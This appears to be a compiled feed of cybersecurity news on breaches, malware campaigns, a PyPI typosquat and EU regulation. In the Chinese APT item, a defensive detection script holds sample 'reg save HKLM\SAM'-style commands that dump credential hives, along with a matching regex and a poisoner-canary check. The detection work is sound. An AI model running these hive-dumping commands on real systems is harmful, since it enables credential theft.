Prepare and maintain a plan for responding to cyberattacks so that damage is contained and recovery is quick. The plan should state how to recognise an incident, how to isolate the affected device (disconnect it from the network and leave it for investigation rather than wiping it), and whom to notify in IT or security for immediate remediation. Regular drills and simulations familiarise employees with the procedure, so the response is prompt and effective even when everyone is working from home. Together, these steps improve data protection, reduce risk, and help maintain a secure working environment from any location.

Rafel RAT Used in 120 Campaigns Targeting Android Device Users


Multiple bad actors are using the Rafel RAT malware in about 120 campaigns aimed at compromising Android devices and launching a broad array of attacks that range from stealing data and deleting files to espionage and ransomware. Rafel RAT is an open-source remote administration tool that is spread through phishing campaigns aimed at convincing targets..

The post Rafel RAT Used in 120 Campaigns Targeting Android Device Users appeared first on Security Boulevard.

Jollibee Probes Alleged Data Breach Affecting 32 Million Customers, Asks Public to Remain Vigilant


Jollibee Foods Corporation (JFC), the largest fast-food chain operator in the Philippines, has launched an investigation into an alleged data breach that may have affected millions of its customers worldwide. The probe was initiated after a threat actor claimed responsibility for breaching the company's systems. On June 21, The Cyber Express reported that an attacker operating under the alias "Sp1d3r" claimed to hold the data of 32 million customers of the fast-food chain and offered the database for sale on a dark web forum for $40,000. (Image: Jollibee cyberattack post. Source: X)

Details of Jollibee Probe into Cyberattack

The Philippines National Privacy Commission (NPC) requires organizations in the country to report cybersecurity incidents and inform affected stakeholders within 72 hours of discovery. On June 22, Richard Shin, Chief Financial Officer and Corporate Information Officer of JFC, released a statement saying the company was addressing "a cybersecurity incident" that reportedly affected it "in addition to other subsidiaries".

"The Company is addressing the incident and has implemented its response protocols and deployed enhanced security measures to further protect the Company's and its subsidiaries' data against threats. The Company has also launched its investigation on the matter to understand the scope of this incident, and is currently working with the relevant authorities and experts in its investigation," the statement said.

JFC added that its e-commerce platforms, and those of its subsidiaries' brands, were unaffected by the cyberattack and remained operational, and that the safety of stakeholder data was paramount for the company.

"JFC recognizes the value and importance of the confidentiality of personal information of its stakeholders. The Company assures the public of its commitment to prioritize the protection and confidentiality of such personal information, including customer data, by continuously fortifying its defenses against future threats," the company said. "The Company further assures the public that it continues to monitor and update its security measurements as appropriate under the circumstances, and as may be required by the results of its investigation into this matter," it added.

The fast-food group urged the public to stay vigilant and follow good information security practices, including keeping passwords secure and changing them often.

Jollibee’s Cybersecurity Concerns  

The claim appeared on the data leak forum BreachForums on June 20. The threat actor, "Sp1d3r", said they had breached the company and obtained the data of 32 million Jollibee customers, including names, addresses, phone numbers, email addresses and hashed passwords. The actor also claimed to have exfiltrated 600 million rows of data covering food delivery, sales orders, transactions and service details. JFC is investigating the alleged attack across its brands and subsidiaries, including Greenwich, Red Ribbon, Burger King Philippines and Highlands Coffee.

This is not the first time Jollibee has drawn criticism for its security. In December 2017, JFC disclosed a breach of its delivery website, and the NPC warned that the data of 18 million customers was at "a very high risk" of exposure. After an investigation, the NPC suspended Jollibee's delivery website in May 2018 over "serious vulnerabilities", and JFC also took down the delivery websites of its other brands.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Empowering Women in Cybersecurity: Insights from Irene Corpuz


In a world increasingly dependent on digital infrastructure, the cybersecurity landscape continues to evolve, and so does the role of women in this critical field. Irene Corpuz, a cyber policy expert at the Dubai Electronic Security Center and co-founder and board member of Women in Cyber Security Middle East (WiCSME), shared her insights on effective strategies for encouraging women in cybersecurity and the challenges small businesses face in prioritizing cybersecurity at The World Cybercon META Edition hosted by The Cyber Express in Dubai.

Strategies to Encourage Women in Cybersecurity

Irene Corpuz believes that collaboration and communication are key to empowering women in cybersecurity. "One of the most effective strategies is to collaborate and communicate our objectives and advocacy for increasing and empowering women in cyber," she states. By showcasing women in various roles, from mentors and speakers to leaders, on platforms like conferences, the visibility and success of these women can inspire others to pursue their ambitions in the field. "Seeing other women grow and succeed motivates them to pursue their dreams and careers," Irene emphasizes. She highlights the importance of a supportive community, which acts as a backbone for women in cybersecurity, helping them navigate and thrive in the industry.

Trends in Women's Participation in Cybersecurity

Reflecting on her journey, Irene observes a positive trend in the participation of women in cybersecurity. When WiCSME was founded in 2018, women made up only 12% of the cybersecurity workforce. However, this number has significantly increased to 25% by last year. This growth is attributed not just to WiCSME but to the collective efforts of various women-in-cyber organizations worldwide. "There’s a continuous growth, and awareness of the importance of diversity and inclusion in cybersecurity is becoming more widespread," Irene notes. This trend signifies a growing recognition of the value that diverse perspectives bring to the cybersecurity industry.

Challenges for Small Businesses in Cybersecurity

Transitioning the conversation to small businesses, Irene sheds light on the challenges they face in prioritizing cybersecurity. "Small businesses and young entrepreneurs often face constraints in financial resources," she explains. As these businesses focus on growth and expanding their customer base, investing in cybersecurity often becomes a secondary priority. However, Irene stresses the importance of embedding a cybersecurity and awareness culture from the beginning, even if it means taking small steps. "Startups and SMEs need to take baby steps in embedding cybersecurity and awareness culture within their employees," she advises. As these companies mature, their cybersecurity measures should evolve accordingly to build a resilient defense against cyber threats.

Conclusion

The insights shared by Irene Corpuz underscore the significance of community support and visibility in empowering women in cybersecurity. Furthermore, her perspective on the challenges faced by small businesses highlights the necessity of integrating cybersecurity practices gradually and consistently. As the cybersecurity landscape continues to evolve, the contributions of women and the resilience of small businesses will play a pivotal role in shaping a secure digital future.

Social Media Warning Labels, Should You Store Passwords in Your Web Browser?

In this episode of the Shared Security Podcast, the team debates the Surgeon General’s recent call for social media warning labels and explores the pros and cons. Scott discusses whether passwords should be stored in web browsers, potentially sparking strong opinions. The hosts also provide an update on Microsoft’s delayed release of CoPilot Plus PCs […]

The post Social Media Warning Labels, Should You Store Passwords in Your Web Browser? appeared first on Shared Security Podcast.

The post Social Media Warning Labels, Should You Store Passwords in Your Web Browser? appeared first on Security Boulevard.


U.S. Bans Sale of Kaspersky Cybersecurity Software


Long simmering suspicions about the loyalty of Kaspersky Software, a cybersecurity firm headquartered in Russia, came to a head this week after the U.S. government banned the sale of the company’s software, effective July 20th, to both companies and individual consumers. In addition, the U.S. Treasury Department has placed sanctions on 12 senior leaders of..

The post U.S. Bans Sale of Kaspersky Cybersecurity Software appeared first on Security Boulevard.

Ross Randall’s 3 Essential Tips to Strengthening Your District’s Multilayered Cybersecurity

Recently, we hosted Ross Randall, Director of Technology at Lamar County School District in Georgia, and Tim Miles, Director of Technology at Steamboat Springs School District in Colorado, for a summer-inspired live webinar focused on fortifying your district’s multilayered cybersecurity strategy. From beach balls to firewalls, Ross and Tim generously shared their practical insights, […]

The post Ross Randall’s 3 Essential Tips to Strengthening Your District’s Multilayered Cybersecurity appeared first on ManagedMethods.

The post Ross Randall’s 3 Essential Tips to Strengthening Your District’s Multilayered Cybersecurity appeared first on Security Boulevard.

Python Developers Targeted Via Fake Crytic-Compilers Package

As per recent reports, cybersecurity experts uncovered a troubling development on the Python Package Index (PyPI) – a platform used widely by developers to find and distribute Python packages. A malicious package named ‘crytic-compilers‘ was discovered, mimicking the legitimate ‘crytic-compile’ library developed by Trail of Bits. This fraudulent package was designed with sinister intent: to […]

The post Python Developers Targeted Via Fake Crytic-Compilers Package appeared first on TuxCare.

The post Python Developers Targeted Via Fake Crytic-Compilers Package appeared first on Security Boulevard.

Report Details Reemergence of Lockbit 3.0 Ransomware Syndicate


An analysis of ransomware attacks claimed by cybercriminal syndicates, published today by NCC Group, a provider of managed security services, finds that LockBit 3.0 has reemerged to claim the top spot among the most prominent threat actors. Previously dormant following the group’s takedown by law enforcement earlier this year,..

The post Report Details Reemergence of Lockbit 3.0 Ransomware Syndicate appeared first on Security Boulevard.

Association of Texas Professional Educators Reports Data Breach Affecting Over 414,000 Members


The Association of Texas Professional Educators (ATPE) is notifying more than 414,000 of its members that their personal information may have been compromised in a data breach earlier this year. ATPE is the largest community of educators in Texas and aims to elevate public education in the state; it advocates for Texas educators and provides affordable products and services, including legal and educational services. In a recent letter, the organization said it detected suspicious activity on its network on Feb. 12 and launched an investigation with the help of a cybersecurity firm.

Association of Texas Professional Educators Data Breach

On February 12, 2024, ATPE detected abnormal activity on its network, which led to a comprehensive forensic investigation. The investigation concluded on March 20, 2024, and found evidence that some of ATPE's systems had been accessed by an unauthorized user. Based on this finding, ATPE reviewed the affected systems to identify the specific individuals and types of information that may have been compromised. The accessed information varied depending on when members joined:
  • For those who became members before May 15, 2021, the breach may have exposed names, addresses, dates of birth, Social Security numbers and medical records. Tax Identification Numbers could also possibly have been accessed if employers used them as identifiers.
  • For members who received payments from ATPE via ACH transactions, financial account information could also have been accessed.
ATPE said that while it has no evidence that anyone's information has been misused, it is notifying members "out of an abundance of caution and for purposes of full transparency."

Response to Breach Incident and Credit Offering

Since discovery of the breach, ATPE stated that it has taken several steps to secure its systems, including:
  • Disconnected all access to its network.
  • Changed administrative credentials.
  • Installed enhanced security safeguards on ATPE's environment and endpoints.
  • Restored ATPE's website in a Microsoft Azure hosted environment.
The organization said it will continue efforts to mitigate potential harm. ATPE is providing affected members with one year of free credit monitoring and identity protection services through Cyberscout, a company specializing in fraud assistance; members must enroll by Sept. 15, 2024, and activation details are in the notification letters sent to members' homes. The association also advised members to remain vigilant for identity theft and fraud, review account statements, and monitor credit reports for suspicious or unauthorized activity. ATPE said it sincerely regrets any concern or inconvenience caused by the incident and remains committed to safeguarding members' personal information. Law firm Federman & Sherwood has announced that it will conduct a separate investigation into the breach.

Several Chinese APTs Have Been Targeting Telecommunications of Asian Country Since 2021


Researchers have found that several threat actor groups associated with Chinese state-linked espionage have been running a sustained hacking campaign against telecommunications operators in an unnamed Asian country since at least 2021. The attackers relied on custom malware and tradecraft tied to multiple China-linked espionage groups, which points to Chinese state sponsorship.

Malware Variants Used in Chinese Espionage Campaign

Researchers from Symantec observed several custom malware families linked to China-based threat actors, including:
  • Coolclient: A backdoor attributed to the Fireant group (also known as Mustang Panda or Earth Preta) that logs keystrokes and communicates with a command-and-control server. The variant used in this campaign was delivered via a trojanized VLC media player.
  • Quickheal: A backdoor associated with the Needleminer group, also known as RedFoxtrot or Nomad Panda. The variant used in the campaign was nearly identical to those documented in 2021. It communicated with a command server at swiftandfast[.]net.
  • Rainyday: A backdoor tied to the Firefly group, also known as Naikon. Multiple variants were deployed using trojanized executables to sideload malicious loaders and decrypt payloads. At least one loader variant matched those linked to Firefly in 2021.
The attackers also used a range of tactics, techniques and procedures (TTPs) to move through victim networks: keylogging malware that was possibly custom-developed, port scanning to find reachable services, credential theft by dumping registry hives, and abuse of the Remote Desktop Protocol (RDP). They also ran the publicly available tool Responder as a Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS) and multicast DNS (mDNS) poisoner, which answers broadcast name lookups on the local segment in order to capture credentials. Nearly all victims were telecom operators, along with a services company serving the telecoms sector and a university in a different Asian country. The researchers suggested the campaign may date back as far as 2020.
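Two of the TTPs above leave clear traces in ordinary telemetry, and the script below shows how to pick them out, as an added example that is neither Symantec's nor the attackers' code: it flags process-creation events whose command line saves or exports the SAM, SYSTEM or SECURITY hives, and it spots an LLMNR/NBT-NS poisoner by watching for any answer to a canary hostname that is never registered on the network. The log records, host names, user names, IP addresses and the canary name are constructed for the example.

```python
"""Host and network detections for two TTPs from the campaign.

Added example, not Symantec's or the attackers' code. The records below are
constructed to mimic the fields of a Windows Security 4688 / Sysmon event 1
process-creation record and of an LLMNR/NBT-NS response captured by a
canary host; host names, users, IPs and the canary name are assumptions.
"""
import re

# 1. Registry hive dumping (MITRE ATT&CK T1003.002): "reg save" / "reg export" of
#    HKLM\SAM, HKLM\SYSTEM or HKLM\SECURITY. Verbose, case-insensitive pattern so
#    reg vs reg.exe, quoting and the long hive name all match.
HIVE_DUMP_RE = re.compile(
    r"""(?ix)
    \breg(?:\.exe)?\s+                  # reg or reg.exe
    (?:save|export)\s+                  # sub-commands that write a hive to disk
    "?(?:hklm|hkey_local_machine)\\     # hive root, optionally quoted
    (?:sam|system|security)\b           # the three hives holding credential material
    """
)

# Constructed process-creation events: (host, user, command line)
PROCESS_EVENTS = [
    ("TEL-DC01", "svc_backup", r'reg.exe save "HKLM\SAM" C:\Windows\Temp\sam.hiv'),
    ("TEL-WS17", "jdoe", r"reg save hklm\system \\10.0.0.9\share\sys.bak"),
    ("TEL-WS17", "jdoe", r'cmd.exe /c "reg export HKEY_LOCAL_MACHINE\SECURITY c:\sec.reg"'),
    ("TEL-WS22", "admin", r"reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"),
    ("TEL-WS22", "admin", r"reg save HKCU\Software settings.hiv"),  # user hive: benign
]


def find_hive_dumps(events):
    """Return (host, user, cmdline) for every event that writes a credential hive out."""
    return [(host, user, cmd) for host, user, cmd in events if HIVE_DUMP_RE.search(cmd)]


# 2. LLMNR/NBT-NS poisoning. A canary host periodically asks for a name that is
#    never registered anywhere on the LAN. Legitimate resolution can only fail,
#    so any answer for the canary comes from a poisoner such as Responder.
CANARY_NAME = "wpad-canary-7f3a"  # hypothetical; pick a name nothing will ever own

# Constructed name-resolution responses seen by the canary host: (queried name, answering IP)
NAME_RESPONSES = [
    ("fileserver01", "10.0.0.5"),
    ("wpad-canary-7f3a", "10.0.0.77"),
    ("WPAD-CANARY-7F3A", "10.0.0.77"),   # names are case-insensitive on the wire
    ("printer-3", "10.0.0.12"),
]


def find_poisoners(responses, canary=CANARY_NAME):
    """Return the sorted list of IPs that answered for the canary name."""
    return sorted({ip for name, ip in responses if name.lower() == canary.lower()})


if __name__ == "__main__":
    for host, user, cmd in find_hive_dumps(PROCESS_EVENTS):
        print(f"[hive dump] {host} {user}: {cmd}")
    for ip in find_poisoners(NAME_RESPONSES):
        print(f"[poisoner ] {ip} answered for canary {CANARY_NAME}")
```

The hive-dump rule deliberately ignores "reg query" and user hives under HKCU so that routine administration does not page anyone; in production the same pattern would be applied to command lines from Sysmon or Security 4688 events, and the canary check to the resolver logs of a dedicated low-privilege host that issues the lookup on a schedule.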

Campaign Motives and Attribution

The custom malware used exclusively by Fireant, Needleminer and Firefly is strong evidence that Chinese state-sponsored groups are behind the campaign; Firefly has been linked to a Chinese military intelligence unit by the U.S.-China Commission. The degree of coordination between the groups is unclear: they may have acted independently, shared personnel and tooling, or collaborated actively. The motive is equally uncertain. Plausible objectives include intelligence gathering on the telecommunications sector, eavesdropping on voice and data communications, or building disruptive capability against critical infrastructure. Telecom operators and other organizations should apply the latest protection updates, block the published indicators, and monitor for the TTPs described above, such as registry hive dumping and LLMNR/NBT-NS poisoning. The researchers published indicators of compromise and file hashes to help defenders detect the campaign.

Pentagon Cybersecurity, Workforce Woes Threaten Tech Rollout – Source: www.databreachtoday.com


Source: www.databreachtoday.com. Governance & Risk Management, Government, Industry Specific. New Report Says DOD Is Lagging in Procuring New Tech Amid Cybersecurity Failures. Chris Riotta (@chrisriotta), June 19, 2024. A lack of cybersecurity and software talent is slowing down the development of advanced weapons, says the Government Accountability […]

The post Pentagon Cybersecurity, Workforce Woes Threaten Tech Rollout – Source: www.databreachtoday.com was published first on CISO2CISO.COM & CYBER SECURITY GROUP.

European Union Tightens Cybersecurity Grip with NIS and DORA Regulations


The European Union has put two critical regulatory frameworks in place: the revised Network and Information Security Directive (NIS2) and the Digital Operational Resilience Act (DORA). Both require organizations in scope to implement strong cybersecurity practices to protect sensitive information. Industry experts suggest, however, that the regulations' full potential will only be realized if organizations bring in third-party cybersecurity specialists rather than relying on their own attestations.

The Growing Cyber Threat Landscape

As businesses increasingly depend on digital infrastructure to connect with clients, customize products, and enhance customer experiences, they simultaneously face heightened risks of cyberattacks. Cybercrime is projected to cost the global economy $9.5 trillion in 2024, escalating by 15% annually to reach $10.5 trillion by 2025, according to Cybersecurity Ventures. Even the most advanced cybersecurity systems can be compromised, as evidenced by a recent data breach of the United Kingdom’s Ministry of Defence payroll system, exposing the names and banking details of both current and former armed forces members.

European Union's Response: NIS and DORA

Recognizing the urgent need for stronger cybersecurity measures, the European Union adopted NIS2 and DORA to standardize and raise cybersecurity practice across member states.

NIS2 Directive: NIS2 revises the original 2016 NIS Directive and establishes common, high-level cybersecurity requirements. It strengthens security requirements for in-scope entities, addresses supply chain risk, streamlines incident reporting, and introduces stricter supervision with sanctions for non-compliance. The Commission proposed it in December 2020, political agreement was reached in May 2022, and member states have until 17 October 2024 to transpose it into national law, after which in-scope businesses must comply.

DORA: DORA targets the financial sector, mandating periodic digital operational resilience testing and management systems to monitor and report significant ICT-related incidents to the relevant authorities. It applies from 17 January 2025 and aims to ensure that financial entities such as banks, insurers and investment firms can maintain operational resilience through severe disruption. DORA was developed with the three European Supervisory Authorities, the European Banking Authority (EBA), the European Insurance and Occupational Pensions Authority (EIOPA) and the European Securities and Markets Authority (ESMA), which set the mandatory incident reporting requirements and encourage cooperation and information sharing between financial entities and regulators so they can respond effectively to cybersecurity threats.

The Importance of Third-Party Assessments

Darren Humphries, Group CISO & CTO-Partner at Acora, emphasizes the need for continuous measurement of cybersecurity practices. “Risk management is moving away from art to science,” Humphries explains, highlighting the importance of metrics and documentation in meeting regulatory guidelines. He criticizes the effectiveness of self-attestation, noting that the Ministry of Defence breach partly occurred due to reliance on self-service attestation from suppliers. Instead, Humphries advocates for third-party cybersecurity specialists to evaluate and verify processes, minimizing the risk of oversight. The evolving threat landscape demands that corporations, especially those in the financial sector, become proactive in addressing potential security vulnerabilities. The new EU regulations push businesses in this direction, but they also need to leverage third-party expertise to thoroughly examine and fortify their cybersecurity frameworks. By doing so, they can better protect network transactions and comply with regulatory requirements, reducing the likelihood of cyber incidents.

Conclusion

The new EU regulations, NIS2 and DORA, represent a significant step forward in raising cybersecurity practice across Europe. To get the full benefit and genuinely withstand evolving threats, however, businesses need independent third-party assessment alongside their own efforts. That combination gives them a defensible basis for claiming that sensitive information is protected and that regulatory requirements are met, and reduces their cybersecurity risk in an increasingly digital world.